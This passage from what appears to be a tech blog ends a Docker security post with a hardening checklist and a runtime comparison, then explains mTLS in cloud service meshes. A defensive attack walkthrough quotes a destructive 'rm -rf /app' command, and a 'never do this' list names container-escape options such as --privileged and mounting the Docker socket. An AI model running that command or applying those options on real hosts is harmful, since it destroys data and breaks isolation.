        → WORKS - but secrets aren't in the container (mounted as read-only volume)

Step 9: Attacker tries: rm -rf /app
        → BLOCKED - filesystem mounted read-only (--read-only flag)

Even with RCE, the attacker can't escape, can't persist, can't exfiltrate sensitive data, and can't cause resource exhaustion.

11.8 Hardening Checklist

Here's a practical checklist for production containers:

docker run \
  # Drop all capabilities, add back only what's needed
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \

  # Run as non-root
  --user 1001:1001 \

  # Read-only root filesystem
  --read-only \
  --tmpfs /tmp:rw,noexec,nosuid,size=100m \

  # Limit resources
  --memory=512m \
  --cpus=1.0 \
  --pids-limit=100 \

  # Enable security profiles
  --security-opt=no-new-privileges \
  --security-opt=seccomp=/path/to/custom-seccomp.json \
  --security-opt=apparmor=docker-default \

  # Network isolation
  --network=isolated-net \

  # Never do this:
  # --privileged                          # NO!
  # -v /var/run/docker.sock:/var/...      # NO!
  # -v /:/host                             # NO!
  # --cap-add=SYS_ADMIN                    # NO!

  my-app:latest

11.9 The Bottom Line

Docker's security model is kernel-based isolation, not hypervisor-based isolation. This means:

✅ Fast: No VM overhead
✅ Efficient: Shared kernel, minimal duplication
❌ Shared attack surface: One kernel vulnerability can break all containers

For untrusted workloads (running customer code, multi-tenant SaaS), consider:

Kata Containers (VM-based isolation - see Section 12)
gVisor (userspace kernel emulation)
Firecracker (microVMs)

For trusted workloads (your own apps), Docker's default security + hardening is sufficient — just follow the checklist above.

The key insight: Security isn't binary. It's about reducing the blast radius when (not if) something goes wrong.

12. Docker vs. Podman vs. nerdctl vs. Kata Containers

Now that we've internalized how Docker works layer by layer, the natural question is: what are the alternatives, and where do they diverge at the architectural level? This section isn't a feature checklist — it's a structural comparison. Every difference traced below maps directly to the internals we covered above.

12.1 Architectural Comparison at a Glance

The single biggest differentiator across all these tools is where in the stack they place the daemon — or deliberately remove it.

12.2 Docker — The Daemon-Centric Model

Docker's architecture is exactly what we dissected in Sections 2–5. The defining characteristic is the persistent root daemon (dockerd). Every container operation routes through it. This gives Docker a centralized control plane — easy to manage, easy to expose remotely via API — but it also means:

A single daemon crash can bring down all containers on that host.
The daemon socket (/var/run/docker.sock) is a high-value attack target. Anyone who can write to it has full host control.
Docker does offer a rootless mode (introduced in 2021), but it works by launching a user-space daemon that mimics the traditional architecture rather than removing the daemon entirely. It improves security but retains the fundamental client-server shape.

Docker's strength remains its ecosystem — over 20 million developers, deep integration with CI/CD platforms (GitHub Actions, Jenkins, GitLab), and Docker Hub as the dominant public registry.

12.3 Podman — The Daemonless, Rootless Alternative

Podman (created by Red Hat) flips the architectural model. There is no persistent background daemon. When you run podman run nginx, the CLI directly forks a child process that invokes runc (or crun). Each container is a direct child of your shell or of systemd — the process tree looks like normal user processes.

The security implications are substantial. Podman does not use a central daemon — each container starts as a child process of the user session that launched it. There is no persistent background service and no privileged socket running in the system. This removes the daemon as an attack surface entirely.

Rootless operation is where Podman's architecture truly shines. Podman allows regular unprivileged users to run containers without requiring any root privileges on the host, leveraging user namespaces: inside the container, processes can run as root (UID 0) but that root is mapped to an unprivileged user ID on the host.

Podman's networking in rootless mode uses slirp4netns or the newer pasta backend (introduced in Podman 5.0+) for user-mode networking, rather than Docker's privileged bridge + iptables approach. This is a meaningful trade-off: Docker's mature, privileged networking can achieve higher throughput (8–10 Gbps), while rootless Podman networking, though much improved with the pasta backend, typically peaks around 2–4 Gbps.

Podman also has a native concept of pods — groups of containers that share a network namespace — which maps directly to the Kubernetes Pod model. You can use podman generate kube to create Kubernetes manifests directly from running containers, and podman play kube to deploy them.

12.4 nerdctl — Direct Access to containerd

nerdctl is a Docker-compatible CLI that talks directly to containerd via gRPC — completely bypassing dockerd. The architecture is simpler than Docker's (no extra daemon layer on top of containerd) but still daemon-based, since containerd itself runs as a persistent service.

The goal of nerdctl is to facilitate experimenting with cutting-edge features of containerd that are not present in Docker, including on-demand image pulling (lazy-pulling) and image encryption/decryption.

The standout features that nerdctl exposes — which Docker does not yet support natively — include:

Lazy pulling (eStargz / Nydus / SOCI): Traditional image pulls download every layer before the container can start. Lazy pulling streams layers on demand — the container starts running while layers it hasn't touched yet are still downloading. This can dramatically reduce cold-start times for large images.

Image encryption (OCIcrypt): Layers can be encrypted at rest and in transit. The decryption key is provided at runtime, meaning even a compromised registry can't expose image contents.

P2P image distribution (IPFS): Images can be pushed and pulled over IPFS, removing reliance on centralized registries entirely.

Image signing (cosign): Native --verify=cosign on pull and --sign=cosign on push, bringing software supply chain security into the CLI workflow.

Unlike ctr (containerd's own debugging CLI), nerdctl aims to be user-friendly and Docker-compatible. To some extent, nerdctl + containerd can seamlessly replace docker + dockerd. It also supports nerdctl compose, making multi-container workflow migration straightforward.

12.5 Kata Containers — VM-Based Isolation

All three tools above (Docker, Podman, nerdctl) share the same fundamental isolation boundary: Linux namespaces and cgroups on a shared kernel. If a kernel vulnerability is exploited, isolation can be broken. Kata Containers solves this by replacing the namespace boundary with a hardware virtualization boundary.

At its core, Kata Containers sits underneath your existing container runtime and launches every container (or pod) inside a lightweight VM. Each container gets its own guest kernel running inside a microVM spawned by a hypervisor (QEMU, Cloud-Hypervisor, or AWS Firecracker).

The Kata Container runtime launches each container within its own hardware-isolated VM, and each VM has its own kernel. Due to this higher degree of isolation, certain container capabilities cannot be supported or are implicitly enabled through the VM.

The trade-off is cold-start latency and memory overhead. Although improving, booting VMs takes longer than containers, and VMs have more overhead than namespace-based containers. Firecracker (AWS's microVM hypervisor) has brought boot times down to around 125ms, making this viable for serverless and multi-tenant workloads — but it's still measurably slower than a pure namespace-based container.

12.6 Head-to-Head: The Architectural Trade-offs

Tool	Daemon?	Rootless by default?	Isolation boundary	Kernel shared?	Best fit
🐋 Docker (Engine 28.x)	✅ `dockerd` (persistent, root)	❌ Rootful by default	Namespaces + cgroups	✅ Yes	Developer experience, ecosystem breadth, CI/CD integration
🦑 Podman (5.x)	❌ None (fork/exec model)	✅ Yes (user namespaces)	Namespaces + cgroups	✅ Yes	Security-first, Kubernetes alignment, enterprise / regulated
📦 nerdctl (2.x)	✅ `containerd` (lightweight)	⚠️ Supported, not default	Namespaces + cgroups	✅ Yes	Cutting-edge features, lazy pull / encryption, K8s debugging
🛡️ Kata Containers	✅ `containerd` + kata-shim	N/A (VM boundary)	Hardware VM (KVM / Firecracker)	❌ Each container = own kernel	Multi-tenant clouds, regulated workloads, untrusted code

The table above captures the facts — but the why behind those choices becomes clearer when you see where each tool lands on the isolation vs. performance spectrum:

12.7 When to Choose What

The decision is not about which tool is "best" — it's about which architectural trade-off matches your threat model and operational context.

Choose Docker when developer experience and ecosystem breadth matter most. Your team already knows it, your CI/CD pipelines already use it, and you need the widest tool compatibility. It remains the de facto standard for local development and remains deeply integrated into every major cloud platform.

Choose Podman when security posture is the primary concern. If you're in a regulated industry, running shared CI runners where multiple teams' code executes on the same host, or deploying on immutable Linux distributions (Fedora Atomic, Silverblue, Bazzite), Podman's daemonless and rootless-by-default architecture eliminates entire categories of attack surface. Its native pod model also makes it a natural fit for teams building toward Kubernetes-native workflows.

Choose nerdctl when you want to push the boundaries of what containers can do. Lazy pulling, encrypted images, P2P distribution, and cosign verification are features that don't exist in Docker today. It's also the best tool for understanding containerd's internals directly — since it bypasses dockerd entirely, you're seeing the runtime with one fewer abstraction layer.

Choose Kata Containers when the shared-kernel threat model is unacceptable. Multi-tenant clouds running untrusted customer code, serverless platforms, or workloads that need compliance-grade proof of isolation all benefit from the hard VM boundary that namespaces alone cannot provide. Kata integrates cleanly into Kubernetes via the CRI interface, so it doesn't require rewriting orchestration logic.

In practice, these tools coexist. A single Kubernetes cluster might run routine workloads with runc-backed containerd, security-sensitive jobs with Kata, and use Podman on developer laptops. The result is not competition but coexistence: Docker for accessibility, Podman for compliance and integration. The OCI standards ensure the images are interoperable regardless of which runtime executes them.

13. Summary and Key Takeaways

Docker's power comes from its elegant composition of existing Linux primitives — it invented none of the underlying technology. Namespaces existed since Linux 2.6.24 (2008). cgroups were added in 2.6.24 as well. Overlay filesystems predate Docker by years.

What Docker did was package these primitives into a developer-friendly workflow: a simple CLI, a declarative image format, a global registry, and a composable networking model. The internals are surprisingly simple once you see the full picture — it's the orchestration layer on top that makes it powerful.

Understanding these internals gives you the ability to:

Debug container issues at the kernel level (/proc, cgroup filesystem, namespace inspection)
Optimize images by understanding layer caching and CoW
Harden security by knowing exactly where the isolation boundaries are
Choose alternatives (containerd directly, Podman, kata-containers) with full knowledge of the tradeoffs

Understanding mTLS in Cloud Environments: A Complete Guide

Piyush Jajoo — Sun, 01 Feb 2026 15:39:35 +0000

Introduction

In modern cloud architectures, securing communication between services is paramount. While traditional TLS (Transport Layer Security) protects data in transit, mutual TLS (mTLS) takes security a step further by requiring both parties to authenticate each other. This blog post will help you understand mTLS, how it works in cloud environments, and why it's becoming a standard practice for service-to-service communication.

What is mTLS?

Mutual TLS (mTLS) is a security protocol that extends standard TLS by requiring both the client and server to authenticate each other using digital certificates. In traditional TLS, only the server proves its identity to the client (like when you visit a website with HTTPS). With mTLS, the client must also prove its identity to the server.

Traditional TLS vs mTLS

The fundamental difference between traditional TLS and mTLS is about who proves their identity. Let's compare them side by side:

Understanding the difference:

Traditional TLS (top section):

This is what happens when you visit a website with HTTPS (like your bank's website)
The client (your browser) initiates the connection
The server presents its certificate to prove it's the legitimate website
The client verifies the certificate and says "OK, you're who you claim to be"
Connection established - but notice the server never verified who the client is
The server has no idea if you're a legitimate user, a bot, or an attacker (that's why you still need to log in with a password)

Mutual TLS (bottom section):

Both parties prove their identity before establishing the connection
The server still presents its certificate first (just like traditional TLS)
But then the client ALSO presents its certificate
The server verifies the client's certificate before allowing the connection
Only after BOTH parties are verified does the encrypted connection establish
This is like both people showing ID badges before entering a secure facility

Real-world analogy: Traditional TLS is like calling a company - they answer "Hello, this is Acme Corporation" and you trust them. mTLS is like calling a secure government facility where they first verify who they are, then ask "What's your employee ID number?" before continuing the conversation.

Why mTLS Matters in Cloud Environments

Cloud environments present unique security challenges:

Zero Trust Networks: In cloud environments, you can't rely on network perimeters for security
Service-to-Service Communication: Microservices need to authenticate each other
Dynamic Infrastructure: Services scale up and down, making IP-based security inadequate
Compliance Requirements: Many regulations require strong authentication for sensitive data

How mTLS Works: The Deep Dive

Certificate-Based Authentication

At the heart of mTLS is certificate-based authentication. Think of certificates like digital passports that prove who you are. Here's how the system works:

Understanding the diagram:

Certificate Authority (CA) - The purple box at the top is like a trusted government agency that issues passports. The CA is responsible for creating and signing certificates for both clients and servers. Everyone trusts the CA, so if the CA says "this certificate is valid," everyone believes it.
Signing certificates - When the CA "signs" a certificate, it's like putting an official stamp on a document. This signature proves the certificate is legitimate and hasn't been tampered with. The CA signs both the server's certificate and the client's certificate.
Server Side (blue box) - Your application server receives a certificate from the CA and installs it. This certificate contains the server's identity (like its domain name) and a public key. It's the server's way of proving "I am who I say I am."
Client Side (green box) - Similarly, the client (which could be another microservice, an application, or any service making requests) also gets its own certificate from the CA. This is what makes mTLS "mutual" - the client also has to prove its identity.
The exchange - When they connect, both the client and server present their certificates to each other. Each one checks the other's certificate against the CA to verify it's legitimate. It's like two people showing each other their passports before having a conversation.

This mutual verification ensures that both parties are authentic before any sensitive data is exchanged.

The mTLS Handshake Process

Now let's walk through what actually happens when a client and server establish an mTLS connection. This process is called a "handshake" because it's like two people introducing themselves and agreeing on how to communicate securely.

Breaking down the handshake step-by-step:

Step 1: ClientHello - The client initiates the conversation by sending a "hello" message to the server. This message includes:

Which version of TLS the client supports (like saying "I speak TLS 1.3")
A list of cipher suites (encryption methods) the client can use (like offering multiple languages to communicate in)

Step 2: ServerHello + Certificates - The server responds with three important pieces:

ServerHello: The server picks a TLS version and cipher suite that both parties support
Server Certificate: The server presents its digital certificate (its passport)
CertificateRequest: This is the key difference from regular TLS! The server asks the client "show me YOUR certificate too"

Steps 3-4: Client validates server - Before proceeding, the client performs critical security checks:

The client sends the server's certificate to the Certificate Authority (CA) for verification
The CA checks: Is this certificate signed by me? Is it still valid? Has it been revoked?
The CA responds with "Certificate Valid ✓" if all checks pass
This verification happens in milliseconds

Step 5: Client sends its certificate - If the server's certificate checks out, the client responds with:

Client Certificate: The client's own digital certificate proving its identity
ClientKeyExchange: Information needed to create the encryption keys for the session

Steps 6-7: Server validates client - Now it's the server's turn to verify the client:

The server sends the client's certificate to the Certificate Authority for verification
The CA checks: Is this certificate signed by me? Is it valid? Not revoked?
The CA responds with "Certificate Valid ✓"
Only after this verification does the server accept the client

Steps 8-9: Final confirmation - Both parties send "ChangeCipherSpec" and "Finished" messages:

These messages are encrypted using the agreed-upon encryption method
They confirm that both sides have the same encryption keys
This is the final handshake before secure communication begins

Steps 10-11: Secure communication - With mutual authentication complete:

All data exchanged is now fully encrypted
Both parties have verified each other's identities through the CA
The connection is secure and ready for application data

Important note about CA verification: In practice, the CA verification often happens locally using a cached list of trusted CA certificates and Certificate Revocation Lists (CRLs) or using OCSP (Online Certificate Status Protocol). The diagram shows it as a separate call for clarity, but this verification is what makes the "trusted CA" concept work.

This entire process typically takes just a few milliseconds, but it establishes a secure, mutually authenticated connection that protects against eavesdropping, man-in-the-middle attacks, and impersonation.

mTLS in Cloud Architectures

Microservices Communication

In a typical cloud microservices architecture, mTLS ensures that only authorized services can communicate with each other. Let's look at how this works in practice:

Breaking down the architecture:

External User Connection:

Regular users (from web browsers or mobile apps) connect using standard HTTPS/TLS
Users don't need certificates - they authenticate with usernames/passwords or tokens
Only the API Gateway proves its identity to the user (one-way TLS)

API Gateway (red box):

Acts as the entry point to your cloud application
Handles external TLS connections from users
Converts to mTLS for all internal service communications
This is the boundary between the untrusted internet and your trusted service mesh

Service Mesh (gray box):

Contains all your microservices (Auth, Order, Payment, etc.)
Every service-to-service communication inside requires mTLS
Think of it as a secure internal network where everyone must show ID

Internal mTLS Connections (solid arrows):

API → Auth: When a user request comes in, the API Gateway must verify the user's credentials with the Auth Service
API → Order: To place an order, the API Gateway calls the Order Service
Order → Payment: The Order Service needs to process payment
Payment → DB: The Payment Service securely stores transaction data
Every one of these connections requires both parties to authenticate with certificates

Certificate Manager (yellow box):

Cloud-native service (AWS Certificate Manager, Google Certificate Authority Service, etc.)
Automatically issues certificates to each microservice
Handles certificate rotation before they expire (dotted lines show this automated process)
Without this automation, managing hundreds of certificates would be overwhelming

Why this architecture matters:

If an attacker compromises one service, they still can't impersonate other services without valid certificates
Each service only trusts certificates signed by your Certificate Manager
Network location doesn't matter - a service can't connect just because it's "inside" the cloud
This is the foundation of "zero trust" security

Cloud-Native Implementation Layers

Understanding how mTLS is implemented in cloud environments requires looking at the different layers that work together. This diagram shows the typical architecture stack:

Understanding each layer:

Application Layer (top):

These are your actual microservices - the business logic you write
Microservice A, B, and C could be your user service, order service, payment service, etc.
Key insight: Your application code doesn't need to know about mTLS at all!
Developers can focus on business logic without writing security code

Service Mesh Layer:

Each microservice gets a "sidecar proxy" (usually Envoy)
Think of the proxy as a security guard attached to each microservice
The proxy handles all incoming and outgoing network traffic
This is where mTLS actually happens - the proxies do all the certificate work

Proxy-to-Proxy Communication (bidirectional arrows):

When Microservice A wants to talk to Microservice B, the traffic goes through their proxies
Proxy1 and Proxy2 establish an mTLS connection
The microservices themselves just see regular unencrypted traffic (localhost communication)
This pattern is called "transparent encryption"

Control Plane (blue box):

The brain of the service mesh (Istio, Linkerd, etc.)
Configures all the proxies with routing rules and security policies
Tells each proxy which certificates to use
Monitors the health of all connections
You can think of it as the air traffic controller for your microservices

Certificate Management Layer:

Internal CA: Your own Certificate Authority that issues certificates for your services
Auto-rotation: Automatically renews certificates before they expire (maybe every 24 hours)
This automation is critical - manually managing hundreds of certificates would be impossible

Cloud Infrastructure Layer (bottom):

Kubernetes Cluster: Orchestrates all your containers and services
Secret Store: Securely stores private keys and certificates
Examples: AWS Secrets Manager, Google Cloud Secret Manager, Azure Key Vault
The secret store ensures private keys are never exposed in code or config files

How it all works together:

Kubernetes starts up your microservices
The Service Mesh Control Plane deploys a proxy alongside each microservice
The CA generates certificates for each service and stores them in the Secret Store
The Control Plane retrieves certificates and configures each proxy
When services communicate, their proxies handle mTLS automatically
Certificates rotate regularly without any application downtime
Developers deploy code without worrying about any of this security machinery

This layered approach means mTLS is invisible to application developers while providing robust security across all service communications.

Implementing mTLS in Popular Cloud Platforms

AWS Implementation Pattern

Let's see how mTLS is typically implemented in Amazon Web Services (AWS). This shows a real-world architecture pattern:

Understanding the AWS components:

Internet Users:

Your customers, mobile apps, or web browsers
They connect from the public internet using standard HTTPS

Application Load Balancer (ALB):

The entry point from the internet into your AWS infrastructure
Performs "TLS termination" - decrypts the incoming HTTPS traffic
Uses certificates from AWS Certificate Manager (ACM) for public-facing connections
Forwards unencrypted HTTP traffic to your internal services (this is safe because it's inside your VPC)

VPC (Virtual Private Cloud):

Your isolated network in AWS
Everything inside is protected from the public internet
Think of it as your own private data center in the cloud

EKS Cluster (Elastic Kubernetes Service):

Managed Kubernetes environment provided by AWS
Runs your containerized microservices in "pods"
Each pod contains your application + an Envoy sidecar proxy

Pods with Envoy Sidecars:

Service A Pod and Service B Pod are your actual microservices
Each has an Envoy proxy running alongside (the sidecar pattern)
The proxies handle all mTLS communication between services
Notice the bidirectional mTLS arrow between Pod1 and Pod2

AWS Private CA (orange box):

A managed Certificate Authority service
Issues certificates specifically for internal service-to-service communication
These certificates are never exposed to the public internet
Automatically rotates certificates to maintain security

AWS App Mesh (purple box):

AWS's service mesh solution (built on Envoy)
The control plane that manages all the proxies
Gets certificates from Private CA and distributes them to pods
Configures routing, security policies, and observability

AWS Secrets Manager:

Securely stores the private keys for your certificates
Pods retrieve their keys at startup
Keys are encrypted at rest and in transit
Access is controlled by AWS IAM policies

The flow of traffic:

External: User → HTTPS → ALB (using ACM public certificate)
ALB to internal: ALB → HTTP → Pod1 (unencrypted inside VPC)
Service-to-service: Pod1 ↔ mTLS ↔ Pod2 (secured with Private CA certificates)

Why this split approach?

Public-facing (ACM): Certificates for internet users don't need to verify client identity
Internal (Private CA): Services verify each other's identity with mTLS
This separation follows the principle of "defense in depth" - different security layers for different threats

Key AWS benefits:

Fully managed services (no certificate servers to maintain)
Automatic certificate rotation
Integration with AWS IAM for access control
Pay only for what you use

Google Cloud Implementation Pattern

Now let's look at how Google Cloud Platform (GCP) handles mTLS. While conceptually similar to AWS, GCP has its own set of services and approaches:

Understanding the GCP components:

GKE Cluster (Google Kubernetes Engine):

Google's managed Kubernetes service
Similar to AWS EKS but with tighter integration into GCP services
Provides the foundation for running your containerized workloads

Istio Control Plane (green box):

Google's preferred service mesh solution (open-source)
More feature-rich than AWS App Mesh out of the box
Manages all the Envoy proxies across your workloads
Handles traffic management, security policies, and observability

Workloads with Envoy:

Each workload represents a microservice (similar to pods in AWS)
Workload 1, 2, and 3 could be your user service, product catalog, and checkout service
Each has an Envoy sidecar proxy automatically injected by Istio
Notice the mesh of mTLS connections - every workload can securely talk to every other workload

Certificate Authority Service (CAS) - blue box:

Google's managed CA service
Issues and manages X.509 certificates for your services
Integrates directly with Istio to automate certificate distribution
Supports certificate hierarchies and custom policies
More enterprise-focused than AWS Private CA with features like HSM support

Workload Identity (WI):

A unique GCP feature that ties Kubernetes service accounts to Google Cloud IAM
Provides each workload with a cryptographic identity
Ensures that Workload 1 can only access resources it's authorized for
Eliminates the need to manage service account keys manually
Think of it as giving each microservice its own secure Google account

Secret Manager:

Stores private keys, API keys, and other sensitive data
Encrypts secrets at rest with Google-managed or customer-managed keys
Integrated with Workload Identity for secure access
Provides versioning and audit logging of secret access

The certificate flow:

CAS → Istio: Certificate Authority Service generates certificates and provides them to Istio
Istio → Workloads: Istio distributes certificates to each workload's Envoy proxy
Workload Identity: Authenticates each workload before allowing certificate retrieval
mTLS mesh: All workload-to-workload communication uses mTLS (notice the bidirectional arrows between WL1, WL2, and WL3)

Key differences from AWS:

Istio is first-class: GCP strongly supports Istio with managed versions and deep integration
Workload Identity: More sophisticated identity management than AWS Pod Identity
Full mesh by default: Notice how all three workloads can talk to each other - GCP makes this zero-config with Istio
Open-source focus: Istio and Envoy are open-source, so you're not locked into GCP

Why this architecture matters:

Automatic encryption: Once Istio is installed, mTLS is enabled without code changes
Identity-based security: Services are identified by cryptographic identity, not IP addresses
No secret sprawl: Workload Identity eliminates the need to distribute credentials
Observability built-in: Istio provides metrics, traces, and logs for every connection

This is Google's vision of "zero trust" networking where every connection is authenticated, authorized, and encrypted regardless of network location.

Certificate Lifecycle Management

One of the biggest challenges with mTLS is managing certificate lifecycles. Here's how it works in cloud environments:

Understanding the certificate lifecycle:

1. Certificate Request (Service Starts):

When a new service or pod starts up, it needs a certificate
The service (or service mesh) sends a certificate signing request (CSR) to the Certificate Authority
The request includes the service's identity (like payment-service.prod.svc.cluster.local)

2. Validation:

The CA verifies the request is legitimate
Checks: Is this service authorized to request a certificate?
Uses mechanisms like Workload Identity (GCP) or IAM roles (AWS)
This prevents a rogue service from impersonating another service

3. Issuance:

Once validated, the CA issues the certificate
The certificate includes the service identity, public key, expiration date, and CA signature
This typically happens in seconds or milliseconds

4. Active (In Use):

The service is now using the certificate for all mTLS connections
The certificate proves the service's identity to other services
This is the normal operating state

5. Monitoring:

Continuous monitoring of certificate health
Checks expiration dates, revocation status, and usage patterns
Certificate lifetimes vary (see note in diagram):
- Short-lived (24 hours): Highest security, common in modern service meshes
- Medium (30-90 days): Balance of security and operational overhead
- Long (1 year): Not recommended - too much time for compromise

6. Near Expiry (30 days before expiration):

Automated systems detect the certificate is approaching expiration
Triggers the renewal process well before expiration
30 days is typical, but can be configured (some systems renew at 50% of lifetime)

7. Renewal (Auto-renewal Triggered):

The service mesh automatically requests a new certificate
The old certificate continues working while renewal happens
Once the new certificate is issued, it gradually replaces the old one
This prevents (see note in diagram):
- Service disruptions: No downtime during rotation
- Manual errors: Humans forget or make mistakes
- Security gaps: Expired certificates mean no authentication

8. Back to Active:

The new certificate is now in use
The old certificate may have a grace period before fully expiring
The cycle continues

Alternative paths:

Revoked (Security Incident):

If a private key is compromised or a service is breached
The certificate can be immediately revoked
Other services will refuse connections from this certificate
The service must get a new certificate before resuming operations
Ends the lifecycle prematurely

Expired (Renewal Failed):

If automatic renewal fails (CA unavailable, network issues, configuration problems)
The certificate expires and becomes invalid
Services will reject connections from expired certificates
This typically triggers alerts and requires immediate attention
The service must request a new certificate to resume operations

Why automation is critical:

Imagine managing this manually for hundreds or thousands of services:

You'd need to track expiration dates for every certificate
Rotate them before expiration without causing downtime
Ensure no service uses an old certificate
Respond immediately to security incidents

With automation, this entire lifecycle happens without human intervention, certificates rotate every 24 hours safely, and security incidents trigger immediate revocation.

Real-World Example: E-commerce Platform

Let's see how mTLS secures a cloud-based e-commerce platform. This example shows where TLS and mTLS are used in a realistic production environment:

Let's trace a customer's journey through this system:

Customer-Facing Layer

Mobile App and Web Browser:

Your customers interact with your platform through these interfaces
They use standard HTTPS (TLS) to connect
Customers don't have certificates - they authenticate with login credentials

Edge Layer - The Security Boundary

CDN (CloudFront/Akamai/etc.):

Content Delivery Network that caches static content
Uses regular TLS to serve images, CSS, JavaScript to customers
Provides DDoS protection and global distribution
This is where the public internet meets your infrastructure

API Gateway (red box):

Critical transition point where security changes
Incoming: Accepts TLS connections from the CDN (public-facing)
Outgoing: Uses mTLS for all internal service communications
Acts as the "trust boundary" - everything behind it requires mutual authentication
Validates user JWT tokens or session cookies before forwarding requests

Application Layer - The mTLS Zone

This is where your business logic lives, and every connection requires mTLS:

Product Service:

Manages the product catalog
API Gateway calls it to display products to customers
Cart Service calls it to validate products being added
Connected to Product DB to fetch inventory details

Cart Service:

Manages shopping cart operations
Talks to Product Service to verify item details
Talks to Inventory Service to check stock availability
Stores cart data in Redis Cache for fast access

User Service:

Handles user profiles and preferences
Authenticates user sessions
Order Service calls it to get shipping addresses
Connected to User DB for persistent storage

Order Service:

Orchestrates the order creation process
Calls Payment Service to process transactions
Calls Inventory Service to reserve stock
Calls User Service to get customer details
Stores completed orders in Order DB

Payment Service (dark red box):

Most sensitive service - handles financial transactions
Protected by mTLS on all sides
Only Order Service can call it (enforced by mTLS certificates)
Communicates with external Payment Gateway using mTLS

Inventory Service:

Tracks stock levels across warehouses
Called by both Cart and Order services
Prevents overselling by managing reservations

Data Layer - Database Security

All database connections use mTLS:

Product DB: Stores product catalog data
User DB: Contains sensitive customer information
Order DB: Stores order history and transaction records
Redis Cache: Fast in-memory data store for cart sessions

Why mTLS for databases?

Prevents unauthorized services from accessing data
Even if an attacker breaches your network, they can't connect to databases without valid certificates
Provides audit trail of which services accessed what data

External Services

Payment Gateway (dark red):

Third-party service (Stripe, PayPal, etc.)
Requires mTLS for PCI DSS compliance
Your Payment Service must present a valid certificate
The gateway also presents its certificate to you

Shipping API:

Integration with shipping providers (FedEx, UPS, etc.)
Uses mTLS to ensure only your Order Service can create shipments
Prevents fraudulent shipping labels

Example: Customer Purchases a Product

Let's trace the mTLS connections when a customer buys a product:

Customer clicks "Buy Now" → TLS → CDN → API Gateway
API Gateway → User Service (mTLS): Verify user is logged in
API Gateway → Cart Service (mTLS): Get cart contents
Cart Service → Product Service (mTLS): Validate product details
Cart Service → Inventory Service (mTLS): Check stock availability
API Gateway → Order Service (mTLS): Create order
Order Service → Payment Service (mTLS): Process payment
Payment Service → External Payment Gateway (mTLS): Charge credit card
Order Service → Inventory Service (mTLS): Reserve stock
Order Service → Shipping API (mTLS): Create shipping label
Order Service → Order DB (mTLS): Save order record

Every single internal connection (steps 2-11) uses mTLS. This means:

Each service verifies the identity of the caller
An attacker can't impersonate the Payment Service to steal payment data
If the Cart Service is compromised, it still can't access the Order DB (no valid certificate)
Audit logs show exactly which service made each request

Security Benefits in This Architecture

Isolation: Even if an attacker compromises the Product Service, they can't access the Payment Service without its certificate
Least Privilege: Each service only has certificates for the connections it needs
Compliance: Meets PCI DSS requirements for payment processing
Auditability: Every connection is logged with the service identity
Zero Trust: Network location doesn't matter - a service must prove its identity regardless

This is a production-grade architecture used by major e-commerce platforms to protect millions of transactions daily.

Benefits and Trade-offs

Benefits

Strong Authentication: Both parties verify each other's identity
Zero Trust Architecture: No implicit trust based on network location
Encryption: All data in transit is encrypted
Compliance: Meets regulatory requirements (PCI DSS, HIPAA, SOC 2)
Auditability: Clear record of which services communicate

Trade-offs

Complexity: More moving parts to manage
Performance: Additional handshake overhead (typically 1-5ms)
Certificate Management: Requires robust PKI infrastructure
Debugging: Encrypted traffic is harder to troubleshoot
Initial Setup: Steeper learning curve

Best Practices for Cloud mTLS

1. Use Short-Lived Certificates

One of the most important security practices is using certificates that expire quickly:

Why 24-hour certificates improve security:

Reduced Blast Radius:

If an attacker steals a certificate's private key, they can only use it for 24 hours
Compare this to a 1-year certificate - an attacker has 365 days to exploit it
Even if you detect a breach, short-lived certs naturally expire quickly
Example: If a developer accidentally commits a private key to GitHub, it's only valid until tomorrow

Automatic Rotation:

With 24-hour certs, automation isn't optional - it's required
This forces you to build robust certificate rotation systems from day one
Your systems become resilient to certificate expiration issues
You catch configuration problems within 24 hours instead of discovering them a year later

Less Manual Intervention:

Nobody can manage daily certificate rotation manually
This eliminates human error (forgetting to renew, typos in configuration)
No more "emergency" certificate renewals at 2 AM
Operators don't need to track expiration dates

All paths lead to better security:

Short-lived certificates force good practices
Automation reduces errors
Limited validity period contains breaches
The system becomes "self-healing" with automatic rotation

Traditional thinking: "Long-lived certificates are easier to manage"
Modern reality: "Short-lived certificates are safer and actually easier when automated"

2. Automate Everything

Certificate issuance
Certificate rotation
Certificate revocation
Monitoring and alerting

3. Use Service Mesh

Service meshes like Istio, Linkerd, or AWS App Mesh handle mTLS automatically:

Transparent to application code
Automatic certificate rotation
Built-in observability
Policy enforcement

4. Implement Defense in Depth

mTLS shouldn't be your only security measure. It's one layer in a comprehensive security strategy:

Understanding each security layer:

Layer 1: Network Policies (Foundation)

Kubernetes NetworkPolicy or cloud security groups
Controls which pods/services can even attempt to connect
Example: "Cart Service can only receive traffic from API Gateway"
Think of it as closing all doors and windows, then only opening specific ones
Benefit: Even before mTLS kicks in, most connections are blocked at the network level

Layer 2: mTLS (Highlighted in red)

Service-to-service identity verification and encryption
Even if network policy allows a connection, both services must authenticate
Example: "I allow Cart Service to connect, but you must prove you ARE Cart Service"
Prevents man-in-the-middle attacks and eavesdropping
This is the focus of this blog post

Layer 3: Application Authentication (User Identity)

JWT tokens, OAuth, or session cookies
Validates that the end user is who they claim to be
Example: "The service calling me is authenticated (mTLS), but is the user's token valid?"
mTLS proves the SERVICE identity, JWT proves the USER identity
Real scenario: Payment Service uses mTLS to verify it's talking to Order Service, then checks the JWT to verify the user has permission to make this purchase

Layer 4: Authorization (Permission Check)

RBAC (Role-Based Access Control) or ABAC (Attribute-Based Access Control)
Even authenticated users shouldn't access everything
Example: "You're authenticated, but are you allowed to view THIS order?"
Implements the principle of least privilege
Real scenario: User is authenticated (Layer 3), but can only view their own orders, not other customers' orders

Layer 5: Audit Logging (Detection & Forensics)

CloudTrail (AWS), Cloud Logging (GCP), Azure Monitor
Records who did what, when, and from where
Enables security investigations and compliance reporting
Example: "Service X accessed Database Y at 2:15 PM using certificate Z"
Helps detect anomalies and trace security incidents

How the layers work together:

Imagine an attacker tries to steal customer data:

Layer 1 blocks: Network policy prevents random pods from accessing the database
Layer 2 blocks: Without a valid certificate, can't establish mTLS connection
Layer 3 blocks: Even with a certificate, need a valid user JWT token
Layer 4 blocks: Even with authentication, authorization check fails ("you can't access this data")
Layer 5 detects: All failed attempts are logged for security team review

An attacker must bypass ALL layers to succeed. This is why it's called "defense in depth" - multiple independent security controls that work together.

Real-world example - compromised service:

Let's say an attacker compromises the Product Service:

Layer 1: NetworkPolicy prevents Product Service from connecting to Order DB (it shouldn't need to)
